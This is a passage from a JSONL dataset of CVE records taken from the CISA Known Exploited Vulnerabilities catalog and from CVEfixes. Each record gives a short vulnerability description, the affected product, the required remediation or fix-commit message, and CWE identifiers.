the domain controller to authenticate to the attacker using NTLM.\n\nRequired Action: Apply remediation actions outlined in CISA guidance [https://www.cisa.gov/guidance-applying-june-microsoft-patch].\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26925", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-29499", "text": "Mitel MiVoice Connect Data Validation Vulnerability\n\nAffected: Mitel MiVoice Connect\n\nThe Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-29499", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-30190", "text": "Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability\n\nAffected: Microsoft Windows\n\nA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word. An attacker who successfully exploits this vulnerability can run code with the privileges of the calling application.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-610\n\n[Source: CISA Known Exploited Vulnerabilitie", "cve_id": "CVE-2022-30190", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26134", "text": "Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability\n\nAffected: Atlassian Confluence Server/Data Center\n\nAtlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.\n\nRequired Action: Immediately block all internet traffic to and from affected products AND apply the update per vendor instructions [https://confluence.atlassian.com/doc/confluence-security-advisory-2", "cve_id": "CVE-2022-26134", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-20821", "text": "Cisco IOS XR Open Port Vulnerability\n\nAffected: Cisco IOS XR\n\nCisco IOS XR software health check opens TCP port 6379 by default on activation. An attacker can connect to the Redis instance on the open port and allow access to the Redis instance that is running within the NOSi container.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-923\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-20821", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-30525", "text": "Zyxel Multiple Firewalls OS Command Injection Vulnerability\n\nAffected: Zyxel Multiple Firewalls\n\nA command injection vulnerability in the CGI program of some Zyxel firewall versions could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-78\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-30525", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22947", "text": "VMware Spring Cloud Gateway Code Injection Vulnerability\n\nAffected: VMware Spring Cloud Gateway\n\nSpring Cloud Gateway applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22947", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-1388", "text": "F5 BIG-IP Missing Authentication Vulnerability\n\nAffected: F5 BIG-IP\n\nF5 BIG-IP contains a missing authentication in critical function vulnerability which can allow for remote code execution, creation or deletion of files, or disabling services.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-306\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-1388", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-29464", "text": "WSO2 Multiple Products Unrestrictive Upload of File Vulnerability\n\nAffected: WSO2 Multiple Products\n\nMultiple WSO2 products allow for unrestricted file upload, resulting in remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-22\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-29464", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26904", "text": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-362\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26904", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-21919", "text": "Microsoft Windows User Profile Service Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows User Profile Service contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-1386\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-21919", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-0847", "text": "Linux Kernel Privilege Escalation Vulnerability\n\nAffected: Linux Kernel\n\nLinux kernel contains an improper initialization vulnerability where an unprivileged local user could escalate their privileges on the system. This vulnerability has the moniker of \"Dirty Pipe.\"\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-665\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-0847", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22718", "text": "Microsoft Windows Print Spooler Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Print Spooler contains an unspecified vulnerability which allow for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22718", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22960", "text": "VMware Multiple Products Privilege Escalation Vulnerability\n\nAffected: VMware Multiple Products\n\nVMware Workspace ONE Access, Identity Manager and vRealize Automation contain a privilege escalation vulnerability due to improper permissions in support scripts.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-250\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22960", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22954", "text": "VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability\n\nAffected: VMware Workspace ONE Access and Identity Manager\n\nVMware Workspace ONE Access and Identity Manager allow for remote code execution due to server-side template injection.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22954", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24521", "text": "Microsoft Windows CLFS Driver Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Common Log File System (CLFS) Driver contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-787, CWE-1285\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24521", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-23176", "text": "WatchGuard Firebox and XTM Privilege Escalation Vulnerability\n\nAffected: WatchGuard Firebox and XTM\n\nWatchGuard Firebox and XTM appliances allow a remote attacker with unprivileged credentials to access the system with a privileged management session via exposed management access.\n\nRequired Action: Apply updates per vendor instructions.\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-23176", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22965", "text": "Spring Framework JDK 9+ Remote Code Execution Vulnerability\n\nAffected: VMware Spring Framework\n\nSpring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22965", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22675", "text": "Apple macOS Out-of-Bounds Write Vulnerability\n\nAffected: Apple macOS\n\nmacOS Monterey contains an out-of-bounds write vulnerability that could allow an application to execute arbitrary code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-125\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22675", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22674", "text": "Apple macOS Out-of-Bounds Read Vulnerability\n\nAffected: Apple macOS\n\nmacOS Monterey contains an out-of-bounds read vulnerability that could allow an application to read kernel memory.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-125\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22674", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26871", "text": "Trend Micro Apex Central Arbitrary File Upload Vulnerability\n\nAffected: Trend Micro Apex Central\n\nAn arbitrary file upload vulnerability in Trend Micro Apex Central could allow for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-184\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26871", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-1040", "text": "Sophos Firewall Authentication Bypass Vulnerability\n\nAffected: Sophos Firewall\n\nAn authentication bypass vulnerability in User Portal and Webadmin of Sophos Firewall allows for remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-158\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-1040", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-0543", "text": "Debian-specific Redis Server Lua Sandbox Escape Vulnerability\n\nAffected: Redis Debian-specific Redis Servers\n\nRedis is prone to a (Debian-specific) Lua sandbox escape, which could result in remote code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-862\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-0543", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26318", "text": "WatchGuard Firebox and XTM Appliances Arbitrary Code Execution\n\nAffected: WatchGuard Firebox and XTM Appliances\n\nOn WatchGuard Firebox and XTM appliances, an unauthenticated user can execute arbitrary code.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-122\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26318", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26143", "text": "MiCollab, MiVoice Business Express Access Control Vulnerability\n\nAffected: Mitel MiCollab, MiVoice Business Express\n\nA vulnerability has been identified in MiCollab and MiVoice Business Express that may allow a malicious actor to gain unauthorized access to sensitive information and services, cause performance degradations or a denial of service condition on the affected system.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-306, CWE-406\n\n[Source: CISA Known Exploited Vuln", "cve_id": "CVE-2022-26143", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-21999", "text": "Microsoft Windows Print Spooler Privilege Escalation Vulnerability\n\nAffected: Microsoft Windows\n\nMicrosoft Windows Print Spooler contains an unspecified vulnerability which can allow for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-40, CWE-1386\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-21999", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26486", "text": "Mozilla Firefox Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox\n\nMozilla Firefox contains a use-after-free vulnerability in WebGPU IPC Framework which can be exploited to perform arbitrary code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26486", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-26485", "text": "Mozilla Firefox Use-After-Free Vulnerability\n\nAffected: Mozilla Firefox\n\nMozilla Firefox contains a use-after-free vulnerability in XSLT parameter processing which can be exploited to perform arbitrary code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-26485", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-20708", "text": "Cisco Small Business RV Series Routers Stack-based Buffer Overflow Vulnerability\n\nAffected: Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers\n\nA vulnerability in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code elevate privileges, execute arbitrary commands, bypass authentication and authorization protections, fetch and run unsigned software, or cause a denial of service (DoS).\n\nRequired", "cve_id": "CVE-2022-20708", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24682", "text": "Synacor Zimbra Collaborate Suite (ZCS) Cross-Site Scripting Vulnerability\n\nAffected: Synacor Zimbra Collaborate Suite (ZCS)\n\nSynacor Zimbra Collaboration Suite (ZCS) contains a cross-site scripting (XSS) vulnerability in the Calendar feature that allows an attacker to execute arbitrary code.\n\nRequired Action: Apply updates per vendor instructions.\n\nRansomware: Known\n\nCWE(s): CWE-79, CWE-116\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24682", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-23131", "text": "Zabbix Frontend Authentication Bypass Vulnerability\n\nAffected: Zabbix Frontend\n\nUnsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-290\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-23131", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-23134", "text": "Zabbix Frontend Improper Access Control Vulnerability\n\nAffected: Zabbix Frontend\n\nMalicious actors can pass step checks and potentially change the configuration of Zabbix Frontend.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-284\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-23134", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-24086", "text": "Adobe Commerce and Magento Open Source Improper Input Validation Vulnerability\n\nAffected: Adobe Commerce and Magento Open Source\n\nAdobe Commerce and Magento Open Source contain an improper input validation vulnerability which can allow for arbitrary code execution.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-24086", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-0609", "text": "Google Chromium Animation Use-After-Free Vulnerability\n\nAffected: Google Chromium Animation\n\nGoogle Chromium Animation contains a use-after-free vulnerability that allows a remote attacker to potentially exploit heap corruption via a crafted HTML page. This vulnerability could affect multiple web browsers that utilize Chromium, including, but not limited to, Google Chrome, Microsoft Edge, and Opera.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-416\n\n[Source: CISA Known Ex", "cve_id": "CVE-2022-0609", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22620", "text": "Apple iOS, iPadOS, and macOS Webkit Use-After-Free Vulnerability\n\nAffected: Apple iOS, iPadOS, and macOS\n\nApple iOS, iPadOS, and macOS WebKit contain a use-after-free vulnerability that leads to code execution when processing maliciously crafted web content. This vulnerability could impact HTML parsers that use WebKit, including but not limited to Apple Safari and non-Apple products which rely on WebKit for HTML processing.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-41", "cve_id": "CVE-2022-22620", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-21882", "text": "Microsoft Win32k Privilege Escalation Vulnerability\n\nAffected: Microsoft Win32k\n\nMicrosoft Win32k contains an unspecified vulnerability that allows for privilege escalation.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-21882", "source": "cisa_kev", "timestamp": ""} {"id": "CVE-2022-22587", "text": "Apple Memory Corruption Vulnerability\n\nAffected: Apple iOS and macOS\n\nApple IOMobileFrameBuffer contains a memory corruption vulnerability which can allow a malicious application to execute arbitrary code with kernel privileges.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-20, CWE-787\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "cve_id": "CVE-2022-22587", "source": "cisa_kev", "timestamp": ""} {"id": "54824cd22b2db2778af7", "text": "CVE: CVE-2022-0079\n\n[{'lang': 'en', 'value': 'showdoc is vulnerable to Generation of Error Message Containing Sensitive Information'}]\n\nFix commit: Merge branch 'v2.10.0'", "cve_id": "CVE-2022-0079", "source": "cvefixes", "timestamp": ""} {"id": "92186f07510e1f018cda", "text": "CVE: CVE-2022-0080\n\n[{'lang': 'en', 'value': 'mruby is vulnerable to Heap-based Buffer Overflow'}]\n\nFix commit: proc.c: should not reference `irep` when copying failed.\n\nIt may cause broken reference count numbers.", "cve_id": "CVE-2022-0080", "source": "cvefixes", "timestamp": ""} {"id": "69f14a2859ea1bb5759a", "text": "CVE: CVE-2022-0083\n\n[{'lang': 'en', 'value': 'livehelperchat is vulnerable to Generation of Error Message Containing Sensitive Information'}]\n\nFix commit: Show same message in all cases", "cve_id": "CVE-2022-0083", "source": "cvefixes", "timestamp": ""} {"id": "6942c7dc1dad22f6023a", "text": "CVE: CVE-2022-0084\n\n[{'lang': 'en', 'value': 'A flaw was found in XNIO, specifically in the notifyReadClosed method. The issue revealed this method was logging a message to another expected end. This flaw allows an attacker to send flawed requests to a server, possibly causing log contention-related performance concerns or an unwanted disk fill-up.'}]\n\nFix commit: Merge pull request #291 from OrangeDog/patch-1", "cve_id": "CVE-2022-0084", "source": "cvefixes", "timestamp": ""} {"id": "c7f56f8f40ac8ee5f6a1", "text": "CVE: CVE-2022-0085\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository dompdf/dompdf prior to 2.0.0.'}]\n\nFix commit: Add a default context\n\n- creates a user agent\n- disables following redirects", "cve_id": "CVE-2022-0085", "source": "cvefixes", "timestamp": ""} {"id": "ecc896449061ed982d35", "text": "CVE: CVE-2022-0086\n\n[{'lang': 'en', 'value': 'uppy is vulnerable to Server-Side Request Forgery (SSRF)'}]\n\nFix commit: improve private ip check (#3403)\n\nhttps://huntr.dev/bounties/c1c03ef6-3f18-4976-a9ad-08c251279122/", "cve_id": "CVE-2022-0086", "source": "cvefixes", "timestamp": ""} {"id": "df914e863d07439f5c54", "text": "CVE: CVE-2022-0087\n\n[{'lang': 'en', 'value': \"keystone is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: Do not add `from` parameter to URL on signin page when it matches the default redirect\n\nAdditionally extract redirect logic for ease of reuse", "cve_id": "CVE-2022-0087", "source": "cvefixes", "timestamp": ""} {"id": "9e804fce5c9cef09d0fa", "text": "CVE: CVE-2022-0088\n\n[{'lang': 'en', 'value': 'Cross-Site Request Forgery (CSRF) in GitHub repository yourls/yourls prior to 1.8.3.'}]\n\nFix commit: Add nonce to the logout link (#3264)\n\n* Add nonce to the logout link\r\n* Add tests for cookies being set or reset\r\n* More tests: check nonces are different for different actions & users\r\n\r\nFixes #3170", "cve_id": "CVE-2022-0088", "source": "cvefixes", "timestamp": ""} {"id": "9c67d6aba8c2f9ece764", "text": "CVE: CVE-2022-0121\n\n[{'lang': 'en', 'value': 'hoppscotch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor'}]\n\nFix commit: fix: apply sandbox to HTML preview iframe", "cve_id": "CVE-2022-0121", "source": "cvefixes", "timestamp": ""} {"id": "798fcefcd8b6b6e717b1", "text": "CVE: CVE-2022-0122\n\n[{'lang': 'en', 'value': 'forge is vulnerable to URL Redirection to Untrusted Site'}]\n\nFix commit: Remove forge.util.parseUrl.\n\n- Switch URL parsing to the WHATWG URL Standard `URL` API.\n- Older browser or Node.js usage of related code might now require a URL\n polyfill.", "cve_id": "CVE-2022-0122", "source": "cvefixes", "timestamp": ""} {"id": "f319fc6305e72496c0ab", "text": "CVE: CVE-2022-0128\n\n[{'lang': 'en', 'value': 'vim is vulnerable to Out-of-bounds Read'}]\n\nFix commit: patch 8.2.4009: reading one byte beyond the end of the line\n\nProblem: Reading one byte beyond the end of the line.\nSolution: Check for NUL byte first.", "cve_id": "CVE-2022-0128", "source": "cvefixes", "timestamp": ""} {"id": "809b8f7ecb45e7717477", "text": "CVE: CVE-2022-0132\n\n[{'lang': 'en', 'value': 'peertube is vulnerable to Server-Side Request Forgery (SSRF)'}]\n\nFix commit: Prevent video import on non unicast ips", "cve_id": "CVE-2022-0132", "source": "cvefixes", "timestamp": ""} {"id": "b035391e978a9a5d8a74", "text": "CVE: CVE-2022-0133\n\n[{'lang': 'en', 'value': 'peertube is vulnerable to Improper Access Control'}]\n\nFix commit: Prevent caption listing of private videos", "cve_id": "CVE-2022-0133", "source": "cvefixes", "timestamp": ""} {"id": "250e7135135e96e94595", "text": "CVE: CVE-2022-0139\n\n[{'lang': 'en', 'value': 'Use After Free in GitHub repository radareorg/radare2 prior to 5.6.0.'}]\n\nFix commit: Fix use-after-free in iobank rbtree usage ##io\n\n* See havoc4 bin for reproducer\n* Reported via huntr.dev by 'Cen Zhang'", "cve_id": "CVE-2022-0139", "source": "cvefixes", "timestamp": ""} {"id": "117009bd85a6e10ac028", "text": "CVE: CVE-2022-0144\n\n[{'lang': 'en', 'value': 'shelljs is vulnerable to Improper Privilege Management'}]\n\nFix commit: fix(exec): lockdown file permissions (#1060)\n\nThis locks down file permissions used by the internal implementation of\r\n`shell.exec()`.\r\n\r\nIssue #1058\r\nTested manually using the documented scenarios", "cve_id": "CVE-2022-0144", "source": "cvefixes", "timestamp": ""} {"id": "e3a20a016e66f9aa6a9e", "text": "CVE: CVE-2022-0145\n\n[{'lang': 'en', 'value': 'Cross-site Scripting (XSS) - Stored in GitHub repository forkcms/forkcms prior to 5.11.1.'}]\n\nFix commit: Fix xss though the description in the info.xml file of a theme or module", "cve_id": "CVE-2022-0145", "source": "cvefixes", "timestamp": ""} {"id": "2442138b673694073707", "text": "CVE: CVE-2022-0153\n\n[{'lang': 'en', 'value': 'SQL Injection in GitHub repository forkcms/forkcms prior to 5.11.1.'}]\n\nFix commit: Prevent sql injection through the ids of the action", "cve_id": "CVE-2022-0153", "source": "cvefixes", "timestamp": ""} {"id": "d7d63570e1b782985948", "text": "CVE: CVE-2022-0155\n\n[{'lang': 'en', 'value': 'follow-redirects is vulnerable to Exposure of Private Personal Information to an Unauthorized Actor'}]\n\nFix commit: Drop Cookie header across domains.\n\nFixes https://github.com/follow-redirects/follow-redirects/issues/183", "cve_id": "CVE-2022-0155", "source": "cvefixes", "timestamp": ""} {"id": "b6099e43b35887cab169", "text": "CVE: CVE-2022-0156\n\n[{'lang': 'en', 'value': 'vim is vulnerable to Use After Free'}]\n\nFix commit: patch 8.2.4040: keeping track of allocated lines is too complicated\n\nProblem: Keeping track of allocated lines in user functions is too\n complicated.\nSolution: Instead of freeing individual lines keep them all until the end.", "cve_id": "CVE-2022-0156", "source": "cvefixes", "timestamp": ""} {"id": "21da46e224a6912d56e6", "text": "CVE: CVE-2022-0157\n\n[{'lang': 'en', 'value': \"phoronix-test-suite is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: phodevi: Input sanitization updates for Phoromatic Server\n\nAlso other code formatting / cleanups while reviewing the code...", "cve_id": "CVE-2022-0157", "source": "cvefixes", "timestamp": ""} {"id": "6d67ac39225508b0bbc8", "text": "CVE: CVE-2022-0158\n\n[{'lang': 'en', 'value': 'vim is vulnerable to Heap-based Buffer Overflow'}]\n\nFix commit: patch 8.2.4049: Vim9: reading before the start of the line with \"$\"\n\nProblem: Vim9: reading before the start of the line with \"$\" by itself.\nSolution: Do not subtract one when reporting the error.", "cve_id": "CVE-2022-0158", "source": "cvefixes", "timestamp": ""} {"id": "85271f7f5bd71129e26e", "text": "CVE: CVE-2022-0159\n\n[{'lang': 'en', 'value': \"orchardcore is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: Fix encoding issues (#11008)", "cve_id": "CVE-2022-0159", "source": "cvefixes", "timestamp": ""} {"id": "f9a69bce3966344dda32", "text": "CVE: CVE-2022-0170\n\n[{'lang': 'en', 'value': 'peertube is vulnerable to Improper Access Control'}]\n\nFix commit: Don't display comments of private/internal videos", "cve_id": "CVE-2022-0170", "source": "cvefixes", "timestamp": ""} {"id": "e1ad45192c40e40c739b", "text": "CVE: CVE-2022-0173\n\n[{'lang': 'en', 'value': 'radare2 is vulnerable to Out-of-bounds Read'}]\n\nFix commit: Fix use-after-free in iobank rbtree usage ##io\n\n* See havoc4 bin for reproducer\n* Reported via huntr.dev by 'Cen Zhang'", "cve_id": "CVE-2022-0173", "source": "cvefixes", "timestamp": ""} {"id": "98854b7052e025ddf940", "text": "CVE: CVE-2022-0174\n\n[{'lang': 'en', 'value': 'dolibarr is vulnerable to Business Logic Errors'}]\n\nFix commit: Fix error management", "cve_id": "CVE-2022-0174", "source": "cvefixes", "timestamp": ""} {"id": "7418ce64e7aa4e338f2e", "text": "CVE: CVE-2022-0178\n\n[{'lang': 'en', 'value': 'snipe-it is vulnerable to Improper Access Control'}]\n\nFix commit: Merge pull request #10504 from snipe/fixes/auth_controls_on_api_key_creation\n\nFixes auth controls on api key creation", "cve_id": "CVE-2022-0178", "source": "cvefixes", "timestamp": ""} {"id": "ea2d9e6f26d519add801", "text": "CVE: CVE-2022-0179\n\n[{'lang': 'en', 'value': 'snipe-it is vulnerable to Improper Access Control'}]\n\nFix commit: Merge pull request #10498 from Haxatron/master\n\nFix access control", "cve_id": "CVE-2022-0179", "source": "cvefixes", "timestamp": ""} {"id": "1975aa8cdcaeddfb25bf", "text": "CVE: CVE-2022-0196\n\n[{'lang': 'en', 'value': 'phoronix-test-suite is vulnerable to Cross-Site Request Forgery (CSRF)'}]\n\nFix commit: phoromatic: Some additional input sanitization and starting on some CSRF token handling", "cve_id": "CVE-2022-0196", "source": "cvefixes", "timestamp": ""} {"id": "3a97add07185796fba06", "text": "CVE: CVE-2022-0197\n\n[{'lang': 'en', 'value': 'phoronix-test-suite is vulnerable to Cross-Site Request Forgery (CSRF)'}]\n\nFix commit: phoromatic: Some additional input sanitization and starting on some CSRF token handling", "cve_id": "CVE-2022-0197", "source": "cvefixes", "timestamp": ""} {"id": "7b9aef1d359e6ff649d7", "text": "CVE: CVE-2022-0203\n\n[{'lang': 'en', 'value': 'Improper Access Control in GitHub repository crater-invoice/crater prior to 6.0.2.'}]\n\nFix commit: solve payment method delete issue", "cve_id": "CVE-2022-0203", "source": "cvefixes", "timestamp": ""} {"id": "cdfca13184df6b49e3e8", "text": "CVE: CVE-2022-0204\n\n[{'lang': 'en', 'value': 'A heap overflow vulnerability was found in bluez in versions prior to 5.63. An attacker with local network access could pass specially crafted files causing an application to halt or crash, leading to a denial of service.'}]\n\nFix commit: shared/gatt-server: Fix heap overflow when appending prepare writes\n\nThe code shall check if the prepare writes would append more the\nallowed maximum attribute length.\n\nFixes https://github.com/bluez/bluez/security/a", "cve_id": "CVE-2022-0204", "source": "cvefixes", "timestamp": ""} {"id": "a5498f5431f7126bb3cb", "text": "CVE: CVE-2022-0213\n\n[{'lang': 'en', 'value': 'vim is vulnerable to Heap-based Buffer Overflow'}]\n\nFix commit: patch 8.2.4074: going over the end of NameBuff\n\nProblem: Going over the end of NameBuff.\nSolution: Check length when appending a space.", "cve_id": "CVE-2022-0213", "source": "cvefixes", "timestamp": ""} {"id": "2d5cc4e879d616e6bff4", "text": "CVE: CVE-2022-0219\n\n[{'lang': 'en', 'value': 'Improper Restriction of XML External Entity Reference in GitHub repository skylot/jadx prior to 1.3.2.'}]\n\nFix commit: fix: use secure xml parser for process manifest", "cve_id": "CVE-2022-0219", "source": "cvefixes", "timestamp": ""} {"id": "b880f08760df55ab6e1b", "text": "CVE: CVE-2022-0224\n\n[{'lang': 'en', 'value': 'dolibarr is vulnerable to Improper Neutralization of Special Elements used in an SQL Command'}]\n\nFix commit: Fix #hunterf1d1ce3e-ca92-4c7b-b1b8-934e28eaa486\n\nConflicts:\n\ttest/phpunit/CodingPhpTest.php", "cve_id": "CVE-2022-0224", "source": "cvefixes", "timestamp": ""} {"id": "d3bdecdd3316fdf42068", "text": "CVE: CVE-2022-0226\n\n[{'lang': 'en', 'value': 'livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)'}]\n\nFix commit: Missing csfr check", "cve_id": "CVE-2022-0226", "source": "cvefixes", "timestamp": ""} {"id": "eab1112e26ba5f903ffc", "text": "CVE: CVE-2022-0231\n\n[{'lang': 'en', 'value': 'livehelperchat is vulnerable to Cross-Site Request Forgery (CSRF)'}]\n\nFix commit: CSRF for file configuration URL", "cve_id": "CVE-2022-0231", "source": "cvefixes", "timestamp": ""} {"id": "688525dd1781fa9ca8db", "text": "CVE: CVE-2022-0235\n\n[{'lang': 'en', 'value': 'node-fetch is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor'}]\n\nFix commit: 3.1.1 release (#1451)", "cve_id": "CVE-2022-0235", "source": "cvefixes", "timestamp": ""} {"id": "fc8fd1e8842821b3c3fc", "text": "CVE: CVE-2022-0238\n\n[{'lang': 'en', 'value': 'phoronix-test-suite is vulnerable to Cross-Site Request Forgery (CSRF)'}]\n\nFix commit: phoromatic: Additional input sanitization / validation", "cve_id": "CVE-2022-0238", "source": "cvefixes", "timestamp": ""} {"id": 